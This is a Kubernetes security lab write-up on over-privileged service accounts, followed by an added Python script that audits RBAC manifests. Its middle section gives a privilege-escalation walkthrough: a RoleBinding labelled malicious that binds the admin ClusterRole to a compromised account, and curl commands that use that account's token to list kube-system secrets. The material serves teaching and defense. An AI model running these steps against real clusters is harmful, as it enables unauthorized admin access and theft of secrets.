
Create Over-Privileged Service Account


Goal

  1. Create a Service Account
  2. Create an insecure RBAC setup
  3. Log into a Pod as the Service Account and query the API 

Process

Create SA & assign it to the default namespace

kubectl create serviceaccount attack-sa

Create a Role and apply it

$ cat role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "watch", "list"]


$ kubectl apply -f role.yaml

Create RoleBinding and apply it

$ cat rolebinding.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
- kind: ServiceAccount
  name: attack-sa
  namespace: default
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io


$ kubectl apply -f rolebinding.yaml

Create Pod

$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
spec:
  serviceAccountName: attack-sa
  containers:
  - name: busybox
    image: busybox
    args:
    - sleep
    - "1000000"

$ kubectl apply -f pod.yaml

Get a shell and pull a copy of kubectl

$ kubectl exec -it attack-pod -- sh
> wget https://storage.googleapis.com/kubernetes-release/release/v1.15.0/bin/linux/amd64/kubectl
> chmod +x kubectl
> mv kubectl /bin

Run kubectl against the API

> kubectl get pod

Modify RoleBindings

Goal

  • The privilege to create RoleBindings allows a user to bind roles to a service account
  • This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account
  • To do that, we bind the admin ClusterRole to the compromised service account
  • The JSON manifest below is what gets sent to the API to create that binding

Process

Create RoleBinding

The purpose of this JSON file is to bind the admin "ClusterRole" to the compromised service account:

$ cat malicious-RoleBinding.json
{
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "RoleBinding",
    "metadata": {
        "name": "malicious-rolebinding",
        "namespace": "default"
    },
    "roleRef": {
        "apiGroup": "rbac.authorization.k8s.io",
        "kind": "ClusterRole",
        "name": "admin"
    },
    "subjects": [
        {
            "kind": "ServiceAccount",
            "name": "sa-comp",
            "namespace": "default"
        }
    ]
}

Apply the RoleBinding

$ curl -k -v -X POST \
    -H "Authorization: Bearer <JWT TOKEN>" \
    -H "Content-Type: application/json" \
    https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
    -d @malicious-RoleBinding.json

Abuse role to list secrets

After the admin ClusterRole is bound to the "sa-comp" service account, the compromised service account's token can be used to list secrets:

$ curl -k -v -X GET \
    -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" \
    https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets
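The two labs above show the same weakness from both sides: a ServiceAccount that ends up bound (directly, or via a RoleBinding it was allowed to create) to a role it never needed. The script below is an added example, not part of the original lab, that audits a set of Role/RoleBinding manifests offline and flags exactly those patterns: bindings of high-privilege built-in ClusterRoles (admin, edit, cluster-admin) to ServiceAccounts, rules that let a subject modify RBAC objects (the "create RoleBindings" escalation path), and rules that read secrets. The sample objects are constructed inline: the lab's pod-reader Role and read-pods binding, the lab's malicious binding (with corrected namespace/apiGroup), plus a hypothetical binding-writer Role and deployer ServiceAccount. Rules of built-in ClusterRoles are not modelled; those are flagged by name only.

```python
"""Audit Kubernetes RBAC manifests for over-privileged ServiceAccounts (added example)."""
import json

# Resources/verbs that let a subject grant itself more RBAC (escalation paths).
ESCALATION_RESOURCES = {"roles", "rolebindings", "clusterroles", "clusterrolebindings", "*"}
ESCALATION_VERBS = {"create", "update", "patch", "bind", "escalate", "*"}
# Built-in ClusterRoles whose binding to a ServiceAccount warrants review.
HIGH_PRIV_ROLES = {"admin", "edit", "cluster-admin"}
SECRET_READ_VERBS = {"get", "list", "watch", "*"}

# Constructed sample manifests (see lead-in); "binding-writer" and "deployer" are hypothetical.
SAMPLE_OBJECTS = json.loads("""
[
 {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "Role",
  "metadata": {"namespace": "default", "name": "pod-reader"},
  "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}]},
 {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "RoleBinding",
  "metadata": {"name": "read-pods", "namespace": "default"},
  "subjects": [{"kind": "ServiceAccount", "name": "attack-sa", "namespace": "default"}],
  "roleRef": {"kind": "Role", "name": "pod-reader", "apiGroup": "rbac.authorization.k8s.io"}},
 {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "RoleBinding",
  "metadata": {"name": "malicious-rolebinding", "namespace": "default"},
  "subjects": [{"kind": "ServiceAccount", "name": "sa-comp", "namespace": "default"}],
  "roleRef": {"kind": "ClusterRole", "name": "admin", "apiGroup": "rbac.authorization.k8s.io"}},
 {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "Role",
  "metadata": {"namespace": "default", "name": "binding-writer"},
  "rules": [{"apiGroups": ["rbac.authorization.k8s.io"], "resources": ["rolebindings"], "verbs": ["create"]}]},
 {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "RoleBinding",
  "metadata": {"name": "deployer-binds", "namespace": "default"},
  "subjects": [{"kind": "ServiceAccount", "name": "deployer", "namespace": "default"}],
  "roleRef": {"kind": "Role", "name": "binding-writer", "apiGroup": "rbac.authorization.k8s.io"}}
]
""")


def index_roles(objects):
    """Map (kind, namespace, name) -> rules for every Role/ClusterRole in the input."""
    roles = {}
    for obj in objects:
        if obj["kind"] in ("Role", "ClusterRole"):
            ns = obj["metadata"].get("namespace", "") if obj["kind"] == "Role" else ""
            roles[(obj["kind"], ns, obj["metadata"]["name"])] = obj.get("rules", [])
    return roles


def resolve_rules(binding, roles):
    """Rules granted by a binding, or None when the referenced role is not in the
    input (e.g. a built-in ClusterRole such as admin, which this script does not model)."""
    ref = binding["roleRef"]
    ns = binding["metadata"].get("namespace", "") if ref["kind"] == "Role" else ""
    return roles.get((ref["kind"], ns, ref["name"]))


def audit(objects):
    """Return findings as (service_account, binding_name, reason) tuples."""
    roles = index_roles(objects)
    findings = []
    for obj in objects:
        if obj["kind"] not in ("RoleBinding", "ClusterRoleBinding"):
            continue
        sas = [f"{s.get('namespace', '')}/{s['name']}"
               for s in obj.get("subjects", []) if s["kind"] == "ServiceAccount"]
        if not sas:
            continue  # only ServiceAccount subjects are in scope here
        bname, ref = obj["metadata"]["name"], obj["roleRef"]
        if ref["name"] in HIGH_PRIV_ROLES:
            for sa in sas:
                findings.append((sa, bname, f"bound to high-privilege {ref['kind']} {ref['name']}"))
        for rule in resolve_rules(obj, roles) or []:
            resources, verbs = set(rule.get("resources", [])), set(rule.get("verbs", []))
            esc_res, esc_verbs = resources & ESCALATION_RESOURCES, verbs & ESCALATION_VERBS
            if esc_res and esc_verbs:
                reason = "can modify RBAC objects: " + ", ".join(sorted(esc_verbs)) + " on " + ", ".join(sorted(esc_res))
                findings.extend((sa, bname, reason) for sa in sas)
            if resources & {"secrets", "*"} and verbs & SECRET_READ_VERBS:
                findings.extend((sa, bname, "can read secrets") for sa in sas)
    return findings


if __name__ == "__main__":
    for sa, binding, reason in audit(SAMPLE_OBJECTS):
        print(f"{sa}\t{binding}\t{reason}")
```

Run against a live cluster by replacing SAMPLE_OBJECTS with the `items` list of `kubectl get roles,rolebindings,clusterroles,clusterrolebindings -A -o json`. In the sample set, attack-sa produces no finding (pod-reader only reads pods), sa-comp is flagged for the admin binding, and deployer is flagged because create on rolebindings is the path the second lab uses.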